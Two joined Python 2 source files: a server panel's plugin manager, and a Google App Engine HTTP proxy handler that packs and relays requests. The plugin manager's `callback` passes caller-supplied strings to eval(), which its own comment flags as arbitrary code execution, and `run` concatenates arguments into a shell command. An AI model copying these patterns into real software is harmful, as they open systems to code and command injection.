        "mutex": "",
        "path": path,
        "install_checks": checks,
        # NOTE(review): misspelled key kept as-is — consumers may rely on it.
        "uninsatll_checks": checks,
        "coexist": coexist,
        "versions": info['versions'],
        # "updates": info['updates'],
        "display": False,
        "setup": False,
        "setup_version": "",
        "status": False,
    }
    # Substitute the VERSION placeholder with the concrete version string.
    if checks.find('VERSION') > -1:
        pInfo['install_checks'] = checks.replace(
            'VERSION', info['versions'])
    if path.find('VERSION') > -1:
        pInfo['path'] = path.replace(
            'VERSION', info['versions'])
    pInfo['task'] = self.checkSetupTask(
        pInfo['name'], info['versions'], coexist)
    pInfo['display'] = self.checkDisplayIndex(
        info['name'], pInfo['versions'])
    # Installed iff the install-check path exists on disk.
    pInfo['setup'] = os.path.exists(pInfo['install_checks'])
    if coexist and pInfo['setup']:
        pInfo['setup_version'] = info['versions']
    else:
        pInfo['setup_version'] = self.getVersion(pInfo['install_checks'])
    # pluginInfo['status'] = self.checkStatus(pluginInfo)
    pInfo['status'] = False
    return pInfo
def makeCoexist(self, data):
    """Expand a multi-version ('coexist') plugin spec into one plugin-info
    dict per version (title suffixed with the version)."""
    plugins_info = []
    for ver in data['versions']:
        spec = data.copy()
        spec['title'] = spec['title'] + '-' + ver
        spec['versions'] = ver
        plugins_info.append(self.getPluginInfo(spec))
    return plugins_info
def makeList(self, data, sType='0'):
    """Convert one raw info.json dict into a list of plugin-info dicts,
    filtered by category sType ('0' = all categories).

    Coexist plugins with a version list expand to one entry per version.
    """
    plugins_info = []
    if (data['pid'] == sType):
        if type(data['versions']) == list and data.has_key('coexist') and data['coexist']:
            tmp_data = self.makeCoexist(data)
            for index in range(len(tmp_data)):
                plugins_info.append(tmp_data[index])
        else:
            pg = self.getPluginInfo(data)
            plugins_info.append(pg)
        return plugins_info
    if sType == '0':
        if type(data['versions']) == list and data.has_key('coexist') and data['coexist']:
            tmp_data = self.makeCoexist(data)
            for index in range(len(tmp_data)):
                plugins_info.append(tmp_data[index])
        else:
            pg = self.getPluginInfo(data)
            plugins_info.append(pg)
    # print plugins_info, data
    return plugins_info
def getAllList(self, sType='0'):
    """Scan the plugins directory and build the full (unpaged) plugin-info
    list for category sType."""
    plugins_info = []
    for dirinfo in os.listdir(self.__plugin_dir):
        if dirinfo[0:1] == '.':
            # Skip hidden entries such as .git / .DS_Store.
            continue
        path = self.__plugin_dir + '/' + dirinfo
        if os.path.isdir(path):
            json_file = path + '/info.json'
            if os.path.exists(json_file):
                try:
                    data = json.loads(slemp.readFile(json_file))
                    tmp_data = self.makeList(data, sType)
                    for index in range(len(tmp_data)):
                        plugins_info.append(tmp_data[index])
                except Exception, e:
                    # Python 2 except syntax; a malformed info.json is
                    # logged and skipped.
                    print e
    return plugins_info
def getAllListPage(self, sType='0', page=1, pageSize=10):
    """Like getAllList, but returns only one page.

    Returns (page_items_with_status_resolved, total_count).
    """
    plugins_info = []
    for dirinfo in os.listdir(self.__plugin_dir):
        if dirinfo[0:1] == '.':
            # Skip hidden entries.
            continue
        path = self.__plugin_dir + '/' + dirinfo
        if os.path.isdir(path):
            json_file = path + '/info.json'
            if os.path.exists(json_file):
                try:
                    data = json.loads(slemp.readFile(json_file))
                    tmp_data = self.makeList(data, sType)
                    for index in range(len(tmp_data)):
                        plugins_info.append(tmp_data[index])
                except Exception, e:
                    # Python 2 except syntax; malformed info.json skipped.
                    print e
    # Slice out the requested page, then resolve statuses only for it
    # (status checks are expensive shell calls).
    start = (page - 1) * pageSize
    end = start + pageSize
    _plugins_info = plugins_info[start:end]
    _plugins_info = self.checkStatusMThreads(_plugins_info)
    return (_plugins_info, len(plugins_info))
def makeListThread(self, data, sType='0'):
    """Thread-worker twin of makeList (kept separate for the threaded
    scanner); identical filtering/expansion semantics."""
    plugins_info = []
    if (data['pid'] == sType):
        if type(data['versions']) == list and data.has_key('coexist') and data['coexist']:
            tmp_data = self.makeCoexist(data)
            for index in range(len(tmp_data)):
                plugins_info.append(tmp_data[index])
        else:
            pg = self.getPluginInfo(data)
            plugins_info.append(pg)
        return plugins_info
    if sType == '0':
        if type(data['versions']) == list and data.has_key('coexist') and data['coexist']:
            tmp_data = self.makeCoexist(data)
            for index in range(len(tmp_data)):
                plugins_info.append(tmp_data[index])
        else:
            pg = self.getPluginInfo(data)
            plugins_info.append(pg)
    # print plugins_info, data
    return plugins_info
def getAllListThread(self, sType='0'):
    """Scan the plugins directory and build the info list with one
    pa_thread per info.json (alternative to getAllList)."""
    plugins_info = []
    tmp_list = []
    threads = []
    for dirinfo in os.listdir(self.__plugin_dir):
        if dirinfo[0:1] == '.':
            continue
        path = self.__plugin_dir + '/' + dirinfo
        if os.path.isdir(path):
            json_file = path + '/info.json'
            if os.path.exists(json_file):
                data = json.loads(slemp.readFile(json_file))
                # NOTE(review): when sType == '0' and data['pid'] == '0'
                # both ifs fire and the entry is queued twice — confirm
                # pids never equal '0'.
                if sType == '0':
                    tmp_list.append(data)
                if (data['pid'] == sType):
                    tmp_list.append(data)
    ntmp_list = range(len(tmp_list))
    for i in ntmp_list:
        t = pa_thread(self.makeListThread, (tmp_list[i], sType))
        threads.append(t)
    for i in ntmp_list:
        threads[i].start()
    for i in ntmp_list:
        threads[i].join()
    for i in ntmp_list:
        t = threads[i].getResult()
        for index in range(len(t)):
            plugins_info.append(t[index])
    return plugins_info
def makeListProcess(self, data, sType, i, return_dict):
    """Multiprocessing worker: build display entries for one plugin.

    Results are written to return_dict[i] (a multiprocessing.Manager dict)
    instead of being returned, because the worker runs in a child process.

    :param data: parsed info.json dict for a single plugin.
    :param sType: category id string; '0' means "all".
    :param i: slot index in return_dict for this worker's result.
    :param return_dict: shared Manager dict collecting worker output.
    """
    plugins_info = []
    if (data['pid'] == sType):
        if type(data['versions']) == list and data.has_key('coexist') and data['coexist']:
            tmp_data = self.makeCoexist(data)
            for index in range(len(tmp_data)):
                plugins_info.append(tmp_data[index])
        else:
            pg = self.getPluginInfo(data)
            plugins_info.append(pg)
        # return plugins_info
    # NOTE(review): unlike makeListThread there is no early return above, so a
    # plugin whose pid equals '0' while sType is '0' would be appended twice —
    # presumably pids are never '0'; confirm against the data files.
    if sType == '0':
        if type(data['versions']) == list and data.has_key('coexist') and data['coexist']:
            tmp_data = self.makeCoexist(data)
            for index in range(len(tmp_data)):
                plugins_info.append(tmp_data[index])
        else:
            pg = self.getPluginInfo(data)
            plugins_info.append(pg)
    return_dict[i] = plugins_info
    # return plugins_info
def getAllListProcess(self, sType='0'):
    """Collect display info for every installed plugin, one process per plugin.

    Scans self.__plugin_dir for subdirectories containing info.json, runs
    makeListProcess in child processes, and merges their results.

    :param sType: category id string; '0' selects all plugins.
    :return: flat list of plugin-info dicts, in directory scan order.
    """
    plugins_info = []
    tmp_list = []
    manager = multiprocessing.Manager()
    return_dict = manager.dict()
    jobs = []
    for dirinfo in os.listdir(self.__plugin_dir):
        # skip hidden entries such as .git
        if dirinfo[0:1] == '.':
            continue
        path = self.__plugin_dir + '/' + dirinfo
        if os.path.isdir(path):
            json_file = path + '/info.json'
            if os.path.exists(json_file):
                data = json.loads(slemp.readFile(json_file))
                if sType == '0':
                    tmp_list.append(data)
                if (data['pid'] == sType):
                    tmp_list.append(data)
    ntmp_list = range(len(tmp_list))
    for i in ntmp_list:
        p = multiprocessing.Process(
            target=self.makeListProcess, args=(tmp_list[i], sType, i, return_dict))
        jobs.append(p)
        p.start()
    for proc in jobs:
        proc.join()
    # BUG FIX: the previous code did `return_dict.values()` and indexed the
    # resulting list by i. A dict's values() carries no guaranteed ordering,
    # so results could be merged out of order (and a crashed worker caused an
    # IndexError). Look each slot up by its key instead; a missing slot
    # (failed worker) simply contributes nothing.
    for i in ntmp_list:
        for item in return_dict.get(i, []):
            plugins_info.append(item)
    return plugins_info
def getPluginList(self, sType, sPage=1, sPageSize=10):
    """Return one page of the plugin list plus category and pager markup.

    :param sType: category id string ('0' = all).
    :param sPage: 1-based page number.
    :param sPageSize: entries per page.
    :return: dict with 'type' (category list), 'data' (page entries) and
             'list' (rendered pager HTML from slemp.getPage).
    """
    # print sType, sPage, sPageSize
    ret = {}
    ret['type'] = json.loads(slemp.readFile(self.__type))
    # plugins_info = self.getAllListThread(sType)
    # plugins_info = self.getAllListProcess(sType)
    # getAllListPage returns (page_entries, total_count)
    data = self.getAllListPage(sType, sPage, sPageSize)
    ret['data'] = data[0]
    args = {}
    args['count'] = data[1]
    args['p'] = sPage
    args['tojs'] = 'getSList'
    args['row'] = sPageSize
    ret['list'] = slemp.getPage(args)
    return ret
def getIndexList(self):
    """Return the plugins pinned to the home page, in the stored order.

    The index file holds a JSON list of "name-version" strings. For each
    entry the plugin's info.json is expanded and the matching version is
    marked display=True.
    """
    if not os.path.exists(self.__index):
        slemp.writeFile(self.__index, '[]')
    indexList = json.loads(slemp.readFile(self.__index))
    plist = []
    app = []
    for i in indexList:
        info = i.split('-')
        # track each plugin name once (dedup of repeated apps)
        if not info[0] in app:
            app.append(info[0])
        path = self.__plugin_dir + '/' + info[0]
        if os.path.isdir(path):
            json_file = path + '/info.json'
            if os.path.exists(json_file):
                try:
                    data = json.loads(slemp.readFile(json_file))
                    tmp_data = self.makeList(data)
                    for index in range(len(tmp_data)):
                        # select the entry whose version matches this
                        # index record (exact match or contained in a list)
                        if tmp_data[index]['versions'] == info[1] or info[1] in tmp_data[index]['versions']:
                            tmp_data[index]['display'] = True
                            plist.append(tmp_data[index])
                            continue
                except Exception, e:
                    print 'getIndexList:', e
    # Cannot use multiprocessing when using gevent mode
    # plist = self.checkStatusMProcess(plist)
    plist = self.checkStatusMThreads(plist)
    return plist
def setIndexSort(self, sort):
    """Persist a new home-page display order.

    :param sort: '|'-separated "name-version" entries.
    :return: True always.
    """
    entries = sort.split('|')
    slemp.writeFile(self.__index, json.dumps(entries))
    return True
def addIndex(self, name, version):
    """Pin a plugin version to the home page (max 12 entries).

    :param name: plugin name.
    :param version: plugin version string.
    :return: slemp JSON result describing success or failure.
    """
    # Make sure the index file exists before reading it.
    if not os.path.exists(self.__index):
        slemp.writeFile(self.__index, '[]')
    entries = json.loads(slemp.readFile(self.__index))

    key = name + '-' + version
    if key in entries:
        return slemp.returnJson(False, "Please don't add more!")
    if len(entries) >= 12:
        return slemp.returnJson(False, 'The home page can only display up to 12 software!')

    entries.append(key)
    slemp.writeFile(self.__index, json.dumps(entries))
    return slemp.returnJson(True, 'Added successfully!')
def removeIndex(self, name, version):
    """Unpin a plugin version from the home page; idempotent.

    :param name: plugin name.
    :param version: plugin version string.
    :return: slemp JSON success result (also when the entry was absent).
    """
    # Make sure the index file exists before reading it.
    if not os.path.exists(self.__index):
        slemp.writeFile(self.__index, '[]')
    entries = json.loads(slemp.readFile(self.__index))

    key = name + '-' + version
    if key not in entries:
        return slemp.returnJson(True, 'Successfully deleted!')

    entries.remove(key)
    slemp.writeFile(self.__index, json.dumps(entries))
    return slemp.returnJson(True, 'Successfully deleted!')
# shell transfer
def run(self, name, func, version, args='', script='index'):
    """Invoke a plugin's CLI script as a subprocess.

    Builds "python <plugin_dir>/<name>/<script>.py <func> <version> [args]"
    and runs it through slemp.execShell.

    :return: (stdout, stderr) tuple, both stripped; ('', '') when the
             script file does not exist.
    """
    path = slemp.getRunDir() + '/' + self.__plugin_dir + \
        '/' + name + '/' + script + '.py'
    py = 'python ' + path
    if args == '':
        py_cmd = py + ' ' + func + ' ' + version
    else:
        py_cmd = py + ' ' + func + ' ' + version + ' ' + args
    if not os.path.exists(path):
        return ('', '')
    data = slemp.execShell(py_cmd)
    # data = os.popen(py_cmd).read()
    # extra debug output on macOS development machines only
    if slemp.isAppleSystem():
        print 'run', py_cmd
    # print os.path.exists(py_cmd)
    return (data[0].strip(), data[1].strip())
# Map package calls
def callback(self, name, func, args='', script='index'):
    """Call a plugin function in-process by importing its script module.

    :return: (True, result) on success, (False, message) when the plugin
             directory is missing.
    """
    package = slemp.getRunDir() + '/plugins/' + name
    if not os.path.exists(package):
        return (False, "Plugin does not exist!")
    sys.path.append(package)
    # SECURITY: func and args are interpolated into an eval() string.
    # If either can come from an untrusted caller this allows arbitrary
    # code execution — callers must ensure these are trusted values.
    eval_str = "__import__('" + script + "')." + func + '(' + args + ')'
    newRet = eval(eval_str)
    # extra debug output on macOS development machines only
    if slemp.isAppleSystem():
        print 'callback', eval_str
    return (True, newRet)
|
gae_handler.py | #!/usr/bin/env python
# coding:utf-8
"""
GoAgent local-server protocol 3.2
request:
POST /_gh/ HTTP/1.1
HOST: appid.appspot.com
content-length: xxx
http content:
此为body
{
pack_req_head_len: 2 bytes,#POST 时使用
pack_req_head : deflate{
此为负载
original request line,
original request headers,
X-URLFETCH-kwargs HEADS, {
password,
maxsize, defined in config AUTO RANGE MAX SIZE
timeout, request timeout for GAE urlfetch.
}
}
body
}
response:
200 OK
http-Heads:
Content-type: image/gif
headers from real_server
# real_server 为gae让客户端以为的服务器
#可能被gae改变,但对客户端不可见
#未分片body也直接发给客户端
# body 分为下面两部分
http-content:{
response_head{
data_len: 2 bytes,
data: deflate{
HTTP/1.1 status, status_code
headers
content = error_message, if GAE server fail
}
}
body
}
"""
import errno
import time
import xstruct as struct
import re
import string
import ssl
import urlparse
import threading
import zlib
import traceback
from mimetypes import guess_type
import check_local_network
from front import front
from xlog import getLogger
xlog = getLogger("gae_proxy")
def inflate(data):
    """Decompress a raw DEFLATE stream (no zlib header/trailer)."""
    raw_stream = -zlib.MAX_WBITS  # negative wbits => headerless deflate
    return zlib.decompress(data, raw_stream)
def deflate(data):
    """Compress to a raw DEFLATE stream by stripping the 2-byte zlib
    header and the 4-byte Adler-32 trailer from zlib output."""
    wrapped = zlib.compress(data)
    return wrapped[2:-4]
class GAE_Exception(Exception):
    """Protocol-level error raised by the GAE transport layer.

    Carries a numeric error_code (6xx codes are internal to this proxy)
    and a human-readable message formatted as "code:message".
    """

    def __init__(self, error_code, message):
        xlog.debug("GAE_Exception %r %r", error_code, message)
        self.error_code = error_code
        self.message = "%r:%s" % (error_code, message)

    def __str__(self):
        # same text for both %s and %r formatting
        return repr(self.message)

    __repr__ = __str__
def generate_message_html(title, banner, detail=''):
    """Render a simple Google-styled error/message page.

    :param title: text for the <title> element.
    :param banner: headline shown in the page body.
    :param detail: optional extra text below the headline.
    :return: the complete HTML document as a string.
    """
    MESSAGE_TEMPLATE = '''
<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>$title</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A {font-size: 10pt; font-family: arial,sans-serif}
span.nav {font-size: 10pt; font-family: arial,sans-serif; font-weight: bold}
div.nav A,span.big {font-size: 12pt; color: #0000cc}
div.nav A {font-size: 10pt; color: black}
A.l:link {color: #6f6f6f}
A.u:link {color: green}
//--></style>
</head>
<body text=#000000 bgcolor=#ffffff>
<table border=0 cellpadding=2 cellspacing=0 width=100%>
<tr><td bgcolor=#3366cc><font face=arial,sans-serif color=#ffffff><b>Message</b></td></tr>
<tr><td> </td></tr></table>
<blockquote>
<H1>$banner</H1>
$detail
<p>
</blockquote>
<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#3366cc><img alt="" width=1 height=4></td></tr></table>
</body></html>
'''
    template = string.Template(MESSAGE_TEMPLATE)
    return template.substitute(title=title, banner=banner, detail=detail)
def spawn_later(seconds, target, *args, **kwargs):
    """Run target(*args, **kwargs) on a new thread after a delay.

    Any exception raised by target is swallowed and the wrapped result
    becomes None. Uses the Python 2 `thread` module.

    :param seconds: delay before invoking target.
    :return: whatever thread.start_new_thread returns (the thread id).
    """
    def wrap(*args, **kwargs):
        __import__('time').sleep(seconds)
        try:
            result = target(*args, **kwargs)
        except BaseException:
            result = None
        return result
    return __import__('thread').start_new_thread(wrap, args, kwargs)
# Request headers that must not be forwarded to the GAE fetch server
# (hop-by-hop / proxy-specific / client-fingerprint headers).
skip_request_headers = frozenset([
    'Vary',
    'Via',
    'Proxy-Authorization',
    'Proxy-Connection',
    'Upgrade',
    'X-Google-Cache-Control',
    'X-Forwarded-For',
    'X-Chrome-Variations',
])

# Response headers dropped before relaying to the local client; the
# proxy manages its own connection semantics.
skip_response_headers = frozenset([
    # http://en.wikipedia.org/wiki/Chunked_transfer_encoding
    'Connection',
    'Upgrade',
    'Alt-Svc',
    'Alternate-Protocol',
    'X-Head-Content-Length',
    'X-Google-Cache-Control',
    'X-Chrome-Variations',
])
def send_header(wfile, keyword, value):
    """Write one "Name: value\\r\\n" header line to *wfile*.

    Title-cases the name, splits GAE's comma-folded Set-Cookie values back
    into separate lines, quotes bare Content-Disposition filenames, and
    silently drops headers listed in skip_response_headers.
    """
    keyword = keyword.title()
    if keyword == 'Set-Cookie':
        # https://cloud.google.com/appengine/docs/python/urlfetch/responseobjects
        cookies = re.split(r', (?=[^ =]+(?:=|$))', value)
        for cookie in cookies:
            wfile.write("%s: %s\r\n" % (keyword, cookie))
    elif keyword == 'Content-Disposition' and '"' not in value:
        quoted = re.sub(r'filename=([^"\']+)', 'filename="\\1"', value)
        wfile.write("%s: %s\r\n" % (keyword, quoted))
    elif keyword in skip_response_headers:
        return
    else:
        wfile.write("%s: %s\r\n" % (keyword, value))
def send_response(wfile, status=404, headers=None, body=''):
    """Write a complete HTTP response (status line, headers, body) to wfile.

    Adds Content-Length and Connection: close when absent and strips any
    Transfer-Encoding header. Write failures are logged, never raised.

    :param wfile: file-like object wrapping the client socket.
    :param status: numeric HTTP status code.
    :param headers: optional header dict (names are title-cased).
    :param body: response body string.
    """
    # FIX: the default was a mutable {} literal; use None to avoid the
    # shared-mutable-default pitfall (behavior for callers is unchanged).
    headers = dict((k.title(), v) for k, v in (headers or {}).items())
    if 'Transfer-Encoding' in headers:
        del headers['Transfer-Encoding']
    if 'Content-Length' not in headers:
        headers['Content-Length'] = len(body)
    if 'Connection' not in headers:
        headers['Connection'] = 'close'

    try:
        wfile.write("HTTP/1.1 %d\r\n" % status)
        for key, value in headers.items():
            #wfile.write("%s: %s\r\n" % (key, value))
            send_header(wfile, key, value)
        wfile.write("\r\n")
        wfile.write(body)
    except Exception:
        # FIX: narrowed from a bare except (which also swallowed
        # SystemExit/KeyboardInterrupt); client-write failures are expected
        # and only logged.
        xlog.warn("send response fail")
def return_fail_message(wfile):
    """Send a canned 504 "connection timed out" page to the client."""
    title = '504 GAEProxy Proxy Time out'
    banner = u'连接超时,先休息一会再来!'
    html = generate_message_html(title, banner)
    send_response(wfile, 504, body=html.encode('utf-8'))
def pack_request(method, url, headers, body, timeout):
    """Pack an HTTP request into the GoAgent 3.2 wire format.

    The request line, headers and X-URLFETCH-* control parameters are
    deflated into a length-prefixed head, followed by the (possibly
    deflated) body.

    :return: (request_headers, body) where request_headers contains only
             the outer Content-Length and body is the packed payload.
    """
    headers = dict(headers)
    if isinstance(body, basestring) and body:
        if len(body) < 10 * 1024 * 1024 and 'Content-Encoding' not in headers:
            # small uncompressed bodies: try deflate, keep it only if smaller
            zbody = deflate(body)
            if len(zbody) < len(body):
                body = zbody
                headers['Content-Encoding'] = 'deflate'
        if len(body) > 10 * 1024 * 1024:
            xlog.warn("body len:%d %s %s", len(body), method, url)
        headers['Content-Length'] = str(len(body))

    # GAE don't allow set `Host` header
    if 'Host' in headers:
        del headers['Host']

    kwargs = {}
    # parameters consumed by the GAE server side
    if front.config.GAE_PASSWORD:
        kwargs['password'] = front.config.GAE_PASSWORD

    # kwargs['options'] =
    kwargs['validate'] = front.config.GAE_VALIDATE
    if url.endswith(".js"):
        kwargs['maxsize'] = front.config.JS_MAXSIZE
    else:
        kwargs['maxsize'] = front.config.AUTORANGE_MAXSIZE
    kwargs['timeout'] = str(timeout)
    # end of GAE server-side parameters

    payload = '%s %s HTTP/1.1\r\n' % (method, url)
    payload += ''.join('%s: %s\r\n' % (k, v)
                       for k, v in headers.items() if k not in skip_request_headers)
    # for k, v in headers.items():
    #    xlog.debug("Send %s: %s", k, v)
    payload += ''.join('X-URLFETCH-%s: %s\r\n' % (k, v)
                       for k, v in kwargs.items() if v)

    payload = deflate(payload)

    # wire format: 2-byte big-endian head length, deflated head, then body
    body = '%s%s%s' % (struct.pack('!h', len(payload)), payload, body)
    request_headers = {}
    request_headers['Content-Length'] = str(len(body))
    # Content-Length is the only outer request header
    return request_headers, body
def unpack_response(response):
    """Unpack the GoAgent wire format from a GAE response body.

    Reads the 2-byte head length, inflates the head, and populates
    response.app_status, response.app_reason, response.headers and
    response.app_msg (error text from the GAE app, empty on success).

    :raises GAE_Exception: code 600 on any protocol error; the worker
            connection is closed first.
    """
    try:
        data = response.task.read(size=2)
        if not data:
            raise GAE_Exception(600, "get protocol head fail")

        if len(data) !=2:
            raise GAE_Exception(600, "get protocol head fail, data:%s, len:%d" % (data, len(data)))

        headers_length, = struct.unpack('!h', data)
        data = response.task.read(size=headers_length)
        if not data:
            raise GAE_Exception(600,
                                "get protocol head fail, len:%d" % headers_length)

        raw_response_line, headers_data = inflate(data).split('\r\n', 1)
        _, status, reason = raw_response_line.split(None, 2)
        response.app_status = int(status)
        response.app_reason = reason.strip()

        headers_block, app_msg = headers_data.split('\r\n\r\n')
        headers_pairs = headers_block.split('\r\n')
        response.headers = {}
        for pair in headers_pairs:
            if not pair:
                break
            k, v = pair.split(': ', 1)
            response.headers[k] = v

        response.app_msg = app_msg

        return response
    except Exception as e:
        # any parse failure poisons the connection: close it and retry upstream
        response.worker.close("unpack protocol error")
        raise GAE_Exception(600, "unpack protocol:%r at:%s" % (e, traceback.format_exc()))
def request_gae_server(headers, body, url, timeout):
    """POST a packed request to /_gh/ on an appspot host and vet the reply.

    Translates transport/HTTP-level failures into GAE_Exception codes:
    600 no response, 602 IP does not serve GAE, 603 appid missing,
    604 appid over quota, 605 other >300 status. On codes other than
    600/603/604 the serving IP is rescheduled for a health re-check.

    # process on http protocol
    # process status code return by http server
    # raise error, let up layer retry.
    """
    try:
        response = front.request("POST", None, "/_gh/", headers, body, timeout)
        if not response:
            raise GAE_Exception(600, "fetch gae fail")

        if response.status >= 600:
            raise GAE_Exception(
                response.status, "fetch gae fail:%d" % response.status)

        appid = response.ssl_sock.host.split(".")[0]
        if response.status == 404:
            # xlog.warning('APPID %r not exists, remove it.', response.ssl_sock.appid)
            front.appid_manager.report_not_exist(
                appid, response.ssl_sock.ip)
            # google_ip.report_connect_closed(response.ssl_sock.ip, "appid not exist")
            response.worker.close("appid not exist:%s" % appid)
            raise GAE_Exception(603, "appid not exist %s" % appid)

        if response.status == 503:
            xlog.warning('APPID %r out of Quota, remove it. %s',
                         appid, response.ssl_sock.ip)
            front.appid_manager.report_out_of_quota(appid)
            # google_ip.report_connect_closed(response.ssl_sock.ip, "out of quota")
            response.worker.close("appid out of quota:%s" % appid)
            raise GAE_Exception(604, "appid out of quota:%s" % appid)

        server_type = response.getheader("server", "")
        # content_type = response.getheaders("content-type", "")
        if ("gws" not in server_type and "Google Frontend" not in server_type and "GFE" not in server_type) or \
                response.status == 403 or response.status == 405:
            # some ip can connect, and server type can be gws
            # but can't use as GAE server
            # so we need remove it immediately
            xlog.warn("IP:%s not support GAE, headers:%s status:%d", response.ssl_sock.ip, response.headers,
                      response.status)
            response.worker.close("ip not support GAE")
            raise GAE_Exception(602, "ip not support GAE")

        response.gps = response.getheader("x-server", "")

        if response.status > 300:
            raise GAE_Exception(605, "status:%d" % response.status)

        if response.status != 200:
            xlog.warn("GAE %s appid:%s status:%d", response.ssl_sock.ip,
                      appid, response.status)

        return response
    except GAE_Exception as e:
        if e.error_code not in (600, 603, 604):
            front.ip_manager.recheck_ip(response.ssl_sock.ip, first_report=False)
        raise e
def request_gae_proxy(method, url, headers, body, timeout=None):
    """Send a request through the GAE proxy with retries and Brotli handling.

    Adjusts Accept-Encoding for hosts known to serve Brotli (GAE urlfetch
    cannot decode br when gzip is also accepted), then retries with
    increasing timeouts until a usable response is unpacked.

    :raises GAE_Exception: 600 with the accumulated error log when all
            attempts fail; an app-level 605 'status:500' is re-raised
            immediately.
    """
    headers = dict(headers)
    # make retry and time out
    time_request = time.time()

    # GAE urlfetch will not decode br if Accept-Encoding include gzip
    accept_encoding = headers.get("Accept-Encoding", "")
    if "br" in accept_encoding:
        accept_br_encoding = True
        # xlog.debug("accept_br_encoding for %s", url)
    else:
        accept_br_encoding = False

    host = headers.get("Host", "")
    if not host:
        parsed_url = urlparse.urlparse(url)
        host = parsed_url.hostname

    accept_codes = accept_encoding.replace(" ", "").split(",")
    try:
        accept_codes.remove("")
    except:
        pass
    if not accept_br_encoding:
        if "gzip" in accept_encoding:
            # known-Brotli hosts: swap gzip for br so urlfetch decodes it
            if host in front.config.br_sites or host.endswith(front.config.br_endswith):
                accept_codes.remove("gzip")
                if "br" not in accept_codes:
                    accept_codes.append("br")

    accept_code_str = ",".join(accept_codes)
    if accept_code_str:
        headers["Accept-Encoding"] = accept_code_str
    else:
        # NOTE(review): raises KeyError if the client sent no
        # Accept-Encoding header at all — presumably clients always do.
        del headers["Accept-Encoding"]

    error_msg = []
    if not timeout:
        timeouts = [15, 20, 30]
    else:
        timeouts = [timeout]
    if body:
        # uploads get extra headroom on every attempt
        timeouts = [timeout + 10 for timeout in timeouts]

    for timeout in timeouts:
        request_headers, request_body = pack_request(method, url, headers, body, timeout)
        try:
            response = request_gae_server(request_headers, request_body, url, timeout)
            response = unpack_response(response)
            # xlog.debug("accept:%s content-encoding:%s url:%s", accept_encoding,
            #           response.headers.get("Content-Encoding", ""), url)
            if not accept_br_encoding:
                # if gzip in Accept-Encoding, br will not decode in urlfetch
                # else, urlfetch in GAE will auto decode br, but return br in Content-Encoding
                if response.headers.get("Content-Encoding", "") == "br":
                    # GAE urlfetch always return br in content-encoding even have decoded it.
                    del response.headers["Content-Encoding"]
                    # xlog.debug("remove br from Content-Encoding, %s", url)
                    if host not in front.config.br_sites:
                        # remember this host as a Brotli site for next time
                        front.config.BR_SITES.append(host)
                        front.config.save()
                        front.config.load()
                        xlog.warn("Add %s to br_sites", host)

            if response.app_msg:
                xlog.warn("server app return fail, status:%d",
                          response.app_status)
                # if len(response.app_msg) < 2048:
                #    xlog.warn('app_msg:%s', cgi.escape(response.app_msg))

                if response.app_status == 510:
                    # reach 80% of traffic today
                    # disable for get big file.
                    appid = response.ssl_sock.host.split(".")[0]
                    front.appid_manager.report_out_of_quota(appid)
                    response.worker.close(
                        "appid out of quota:%s" % appid)
                    continue

            return response
        except GAE_Exception as e:
            err_msg = "gae_exception:%r %s" % (e, url)
            error_msg.append(err_msg)
            xlog.warn("gae_exception:%r %s", e, url)
            if e.message == '605:status:500':
                # server-side 500 is not retriable; surface it right away
                raise e
        except Exception as e:
            err_msg = 'gae_handler.handler %r %s , retry...' % (e, url)
            error_msg.append(err_msg)
            xlog.exception('gae_handler.handler %r %s , retry...', e, url)

    raise GAE_Exception(600, b"".join(error_msg))
def handler(method, host, url, headers, body, wfile, fallback=None):
    """Top-level GAE request handler: fetch *url* via GAE and stream the
    response back to the client on *wfile*.

    Normalises Range headers so each fetch stays within AUTORANGE_MAXSIZE,
    delegates 206 responses to RangeFetch2, and transparently re-encodes
    gzip bodies for older GAE server versions.

    :param fallback: optional callable tried when GAE fails for Google hosts.
    :return: "ok" on completion, None on errors.
    """
    if not url.startswith("http") and not url.startswith("HTTP"):
        xlog.error("gae:%s", url)
        return

    request_time = time.time()

    org_headers = dict(headers)
    remove_list = []
    req_range_begin = ""
    req_range_end = ""
    req_range = ""
    for k, v in headers.items():
        if v == "":
            remove_list.append(k)
            continue
        if k.lower() == "range":
            req_range = v
            req_range_begin, req_range_end = tuple(
                x for x in re.search(r'bytes=(\d*)-(\d*)', v).group(1, 2))

    # fix bug for android market app: Mobogenie
    # GAE url_fetch refuse empty value in header.
    for key in remove_list:
        del headers[key]

    # force to get content range
    # reduce wait time
    if method == "GET":
        if req_range_begin and not req_range_end:
            # don't known how many bytes to get, but get from begin position
            req_range_begin = int(req_range_begin)
            headers["Range"] = "bytes=%d-%d" % (
                req_range_begin, req_range_begin + front.config.AUTORANGE_MAXSIZE - 1)
            xlog.debug("change Range %s => %s %s",
                       req_range, headers["Range"], url)
        elif req_range_begin and req_range_end:
            req_range_begin = int(req_range_begin)
            req_range_end = int(req_range_end)
            if req_range_end - req_range_begin + 1 > front.config.AUTORANGE_MAXSIZE:
                headers["Range"] = "bytes=%d-%d" % (
                    req_range_begin, req_range_begin + front.config.AUTORANGE_MAXSIZE - 1)
                # remove wait time for GAE server to get knowledge that content
                # size exceed the max size per fetch
                xlog.debug("change Range %s => %s %s",
                           req_range, headers["Range"], url)
        elif not req_range_begin and req_range_end:
            # get the last n bytes of content
            pass
        else:
            # no begin and no end
            # don't add range, some host like github don't support Range.
            # headers["Range"] = "bytes=0-%d" % config.AUTORANGE_MAXSIZE
            pass

    try:
        # the actual GAE proxied request
        response = request_gae_proxy(method, url, headers, body)
        # http://en.wikipedia.org/wiki/Chunked_transfer_encoding
        response.headers.pop("Transfer-Encoding", None)
    except GAE_Exception as e:
        xlog.warn("GAE %s %s request fail:%r", method, url, e)
        if fallback and host.endswith(front.config.GOOGLE_ENDSWITH):
            return fallback()

        send_response(wfile, e.error_code, body=e.message)
        return_fail_message(wfile)
        return "ok"

    if response.app_msg:
        # error packet generated by XX-net itself
        send_response(wfile, response.app_status, body=response.app_msg)
        return "ok"
    else:
        response.status = response.app_status

    if response.status == 206:
        # use org_headers
        # RangeFetch need to known the real range end
        # content must be fetched in ranged pieces
        return RangeFetch2(method, url, org_headers,
                           body, response, wfile).run()

    response_headers = {}
    # build the header set to relay to the client
    for key, value in response.headers.items():
        key = key.title()
        if key in skip_response_headers:
            continue
        response_headers[key] = value

    response_headers["Persist"] = ""
    response_headers["Connection"] = "Persist"

